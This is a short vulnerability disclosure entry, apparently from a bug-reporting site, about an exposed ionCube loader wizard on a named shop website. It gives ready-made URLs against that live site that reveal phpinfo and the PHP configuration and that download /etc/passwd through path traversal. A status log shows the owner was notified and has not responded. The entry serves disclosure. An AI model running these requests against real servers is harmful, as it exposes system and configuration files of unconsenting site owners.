Detailed information
Attacker can get informations about phpinfo(), php.ini. Also have option to get any server files.
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpinfo
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig
http://www.shop.atlet.az/ioncube/loader-wizard.php?page=phpconfig&ininame=../../../../../../../etc/passwd&download=1
Detailed information: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
Comments
-
23 January 2017, 13:15
Vulnerability status
Have not any information from source -
15 December 2016, 11:46
Vulnerability status
Sended e-mail to source about vulnerability -
14 December 2016, 13:25
Added point to Vulnerability
Moderator gave 7 point from 10 to vulnerability -
14 December 2016, 13:19
Vulnerability status
Confirmed by Moderator -
12 December 2016, 02:25
Vulnerability added
Vulnerability added to BUGemot